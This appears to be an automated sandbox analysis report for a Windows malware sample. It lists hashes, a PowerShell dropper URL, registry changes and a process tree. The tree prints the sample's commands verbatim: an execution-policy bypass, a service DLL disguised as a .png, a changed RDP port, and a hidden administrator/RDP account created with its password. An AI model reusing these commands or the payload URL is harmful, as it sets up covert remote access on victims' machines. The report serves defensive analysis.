3647e2dc4336b2eeb828371821c706a329dce645cb16f9c1c31c3faeae8f56dd

Analysis

max time kernel
273s
max time network
292s
platform
windows10_x64
resource
win10v20210408
submitted
08-06-2021 15:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2fd6796fd158c93b14654240533511af6fec03e5.exe
Size

6.0MB
MD5

20f307c716a689f4afa3a76b7143db22
SHA1

2fd6796fd158c93b14654240533511af6fec03e5
SHA256

3647e2dc4336b2eeb828371821c706a329dce645cb16f9c1c31c3faeae8f56dd
SHA512

0a8d1b2d0cbd3860df907eb692aa2d775f021822b4d856c051d84e8056a2c1cf893bab68f471b69db0615341dd2dfe78dfac1b79d2239217cfbdf71bfb84061b

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
18	2248	powershell.exe
20	2248	powershell.exe
21	2248	powershell.exe
22	2248	powershell.exe
24	2248	powershell.exe
26	2248	powershell.exe
28	2248	powershell.exe
30	2248	powershell.exe
32	2248	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

2368
2368

pid	process
2368
2368

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3D9.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI489.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1iimm3bo.pbt.ps1	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI447.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI477.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI488.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kioftf2k.g14.psm1	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 6ead5207ab2cd701	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

728 reg.exe
Runs net.exe

pid	process
728	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	22	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2860	powershell.exe
2860	powershell.exe
2860	powershell.exe
1628	powershell.exe
1628	powershell.exe
1628	powershell.exe
1968	powershell.exe
1968	powershell.exe
1968	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
2860	powershell.exe
2860	powershell.exe
2860	powershell.exe
2248	powershell.exe
2248	powershell.exe
2248	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

624
624

pid	process
624
624

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeIncreaseQuotaPrivilege	1628	powershell.exe
Token: SeSecurityPrivilege	1628	powershell.exe
Token: SeTakeOwnershipPrivilege	1628	powershell.exe
Token: SeLoadDriverPrivilege	1628	powershell.exe
Token: SeSystemProfilePrivilege	1628	powershell.exe
Token: SeSystemtimePrivilege	1628	powershell.exe
Token: SeProfSingleProcessPrivilege	1628	powershell.exe
Token: SeIncBasePriorityPrivilege	1628	powershell.exe
Token: SeCreatePagefilePrivilege	1628	powershell.exe
Token: SeBackupPrivilege	1628	powershell.exe
Token: SeRestorePrivilege	1628	powershell.exe
Token: SeShutdownPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeSystemEnvironmentPrivilege	1628	powershell.exe
Token: SeRemoteShutdownPrivilege	1628	powershell.exe
Token: SeUndockPrivilege	1628	powershell.exe
Token: SeManageVolumePrivilege	1628	powershell.exe
Token: 33	1628	powershell.exe
Token: 34	1628	powershell.exe
Token: 35	1628	powershell.exe
Token: 36	1628	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeIncreaseQuotaPrivilege	1968	powershell.exe
Token: SeSecurityPrivilege	1968	powershell.exe
Token: SeTakeOwnershipPrivilege	1968	powershell.exe
Token: SeLoadDriverPrivilege	1968	powershell.exe
Token: SeSystemProfilePrivilege	1968	powershell.exe
Token: SeSystemtimePrivilege	1968	powershell.exe
Token: SeProfSingleProcessPrivilege	1968	powershell.exe
Token: SeIncBasePriorityPrivilege	1968	powershell.exe
Token: SeCreatePagefilePrivilege	1968	powershell.exe
Token: SeBackupPrivilege	1968	powershell.exe
Token: SeRestorePrivilege	1968	powershell.exe
Token: SeShutdownPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeSystemEnvironmentPrivilege	1968	powershell.exe
Token: SeRemoteShutdownPrivilege	1968	powershell.exe
Token: SeUndockPrivilege	1968	powershell.exe
Token: SeManageVolumePrivilege	1968	powershell.exe
Token: 33	1968	powershell.exe
Token: 34	1968	powershell.exe
Token: 35	1968	powershell.exe
Token: 36	1968	powershell.exe
Token: SeDebugPrivilege	1448	powershell.exe
Token: SeIncreaseQuotaPrivilege	1448	powershell.exe
Token: SeSecurityPrivilege	1448	powershell.exe
Token: SeTakeOwnershipPrivilege	1448	powershell.exe
Token: SeLoadDriverPrivilege	1448	powershell.exe
Token: SeSystemProfilePrivilege	1448	powershell.exe
Token: SeSystemtimePrivilege	1448	powershell.exe
Token: SeProfSingleProcessPrivilege	1448	powershell.exe
Token: SeIncBasePriorityPrivilege	1448	powershell.exe
Token: SeCreatePagefilePrivilege	1448	powershell.exe
Token: SeBackupPrivilege	1448	powershell.exe
Token: SeRestorePrivilege	1448	powershell.exe
Token: SeShutdownPrivilege	1448	powershell.exe
Token: SeDebugPrivilege	1448	powershell.exe
Token: SeSystemEnvironmentPrivilege	1448	powershell.exe
Token: SeRemoteShutdownPrivilege	1448	powershell.exe
Token: SeUndockPrivilege	1448	powershell.exe
Token: SeManageVolumePrivilege	1448	powershell.exe
Token: 33	1448	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2fd6796fd158c93b14654240533511af6fec03e5.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 736 wrote to memory of 2860	736	2fd6796fd158c93b14654240533511af6fec03e5.exe	powershell.exe
PID 736 wrote to memory of 2860	736	2fd6796fd158c93b14654240533511af6fec03e5.exe	powershell.exe
PID 2860 wrote to memory of 3812	2860	powershell.exe	csc.exe
PID 2860 wrote to memory of 3812	2860	powershell.exe	csc.exe
PID 3812 wrote to memory of 1316	3812	csc.exe	cvtres.exe
PID 3812 wrote to memory of 1316	3812	csc.exe	cvtres.exe
PID 2860 wrote to memory of 1628	2860	powershell.exe	powershell.exe
PID 2860 wrote to memory of 1628	2860	powershell.exe	powershell.exe
PID 2860 wrote to memory of 1968	2860	powershell.exe	powershell.exe
PID 2860 wrote to memory of 1968	2860	powershell.exe	powershell.exe
PID 2860 wrote to memory of 1448	2860	powershell.exe	powershell.exe
PID 2860 wrote to memory of 1448	2860	powershell.exe	powershell.exe
PID 2860 wrote to memory of 2572	2860	powershell.exe	reg.exe
PID 2860 wrote to memory of 2572	2860	powershell.exe	reg.exe
PID 2860 wrote to memory of 728	2860	powershell.exe	reg.exe
PID 2860 wrote to memory of 728	2860	powershell.exe	reg.exe
PID 2860 wrote to memory of 2832	2860	powershell.exe	reg.exe
PID 2860 wrote to memory of 2832	2860	powershell.exe	reg.exe
PID 2860 wrote to memory of 504	2860	powershell.exe	net.exe
PID 2860 wrote to memory of 504	2860	powershell.exe	net.exe
PID 504 wrote to memory of 3628	504	net.exe	net1.exe
PID 504 wrote to memory of 3628	504	net.exe	net1.exe
PID 2860 wrote to memory of 2128	2860	powershell.exe	cmd.exe
PID 2860 wrote to memory of 2128	2860	powershell.exe	cmd.exe
PID 2128 wrote to memory of 3176	2128	cmd.exe	cmd.exe
PID 2128 wrote to memory of 3176	2128	cmd.exe	cmd.exe
PID 3176 wrote to memory of 2304	3176	cmd.exe	net.exe
PID 3176 wrote to memory of 2304	3176	cmd.exe	net.exe
PID 2304 wrote to memory of 780	2304	net.exe	net1.exe
PID 2304 wrote to memory of 780	2304	net.exe	net1.exe
PID 2860 wrote to memory of 1060	2860	powershell.exe	cmd.exe
PID 2860 wrote to memory of 1060	2860	powershell.exe	cmd.exe
PID 1060 wrote to memory of 2588	1060	cmd.exe	cmd.exe
PID 1060 wrote to memory of 2588	1060	cmd.exe	cmd.exe
PID 2588 wrote to memory of 3172	2588	cmd.exe	net.exe
PID 2588 wrote to memory of 3172	2588	cmd.exe	net.exe
PID 3172 wrote to memory of 776	3172	net.exe	net1.exe
PID 3172 wrote to memory of 776	3172	net.exe	net1.exe
PID 3636 wrote to memory of 1204	3636	cmd.exe	net.exe
PID 3636 wrote to memory of 1204	3636	cmd.exe	net.exe
PID 1204 wrote to memory of 2832	1204	net.exe	net1.exe
PID 1204 wrote to memory of 2832	1204	net.exe	net1.exe
PID 4072 wrote to memory of 2592	4072	cmd.exe	net.exe
PID 4072 wrote to memory of 2592	4072	cmd.exe	net.exe
PID 2592 wrote to memory of 2308	2592	net.exe	net1.exe
PID 2592 wrote to memory of 2308	2592	net.exe	net1.exe
PID 2264 wrote to memory of 1968	2264	cmd.exe	net.exe
PID 2264 wrote to memory of 1968	2264	cmd.exe	net.exe
PID 1968 wrote to memory of 3960	1968	net.exe	net1.exe
PID 1968 wrote to memory of 3960	1968	net.exe	net1.exe
PID 2732 wrote to memory of 416	2732	cmd.exe	net.exe
PID 2732 wrote to memory of 416	2732	cmd.exe	net.exe
PID 416 wrote to memory of 3920	416	net.exe	net1.exe
PID 416 wrote to memory of 3920	416	net.exe	net1.exe
PID 3200 wrote to memory of 2248	3200	cmd.exe	net.exe
PID 3200 wrote to memory of 2248	3200	cmd.exe	net.exe
PID 2248 wrote to memory of 1688	2248	net.exe	net1.exe
PID 2248 wrote to memory of 1688	2248	net.exe	net1.exe
PID 1568 wrote to memory of 1012	1568	cmd.exe	net.exe
PID 1568 wrote to memory of 1012	1568	cmd.exe	net.exe
PID 1012 wrote to memory of 3452	1012	net.exe	net1.exe
PID 1012 wrote to memory of 3452	1012	net.exe	net1.exe
PID 728 wrote to memory of 200	728	cmd.exe	WMIC.exe
PID 728 wrote to memory of 200	728	cmd.exe	WMIC.exe

C:\Users\Admin\AppData\Local\Temp\2fd6796fd158c93b14654240533511af6fec03e5.exe
"C:\Users\Admin\AppData\Local\Temp\2fd6796fd158c93b14654240533511af6fec03e5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vs1ezoe0\vs1ezoe0.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:3812

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC53.tmp" "c:\Users\Admin\AppData\Local\Temp\vs1ezoe0\CSC29E85CA2AA6F4C6ABF3767A694F2658A.TMP"
4⤵
PID:1316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1448

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:2572

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies registry key
PID:728

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:2832

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:504

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:3628

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:2128

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:3176

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:2304

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:780

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:2588

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:3172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:776

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:3732

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:1496

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3636

C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:1204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
3⤵
PID:2832

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc uJsRDLdG /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4072

C:\Windows\system32\net.exe
net.exe user wgautilacc uJsRDLdG /add
2⤵
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc uJsRDLdG /add
3⤵
PID:2308

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2264

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:1968

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
3⤵
PID:3960

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
3⤵
PID:3920

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3200

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:2248

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
3⤵
PID:1688

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc uJsRDLdG
1⤵
- Suspicious use of WriteProcessMemory
PID:1568

C:\Windows\system32\net.exe
net.exe user wgautilacc uJsRDLdG
2⤵
- Suspicious use of WriteProcessMemory
PID:1012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc uJsRDLdG
3⤵
PID:3452

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
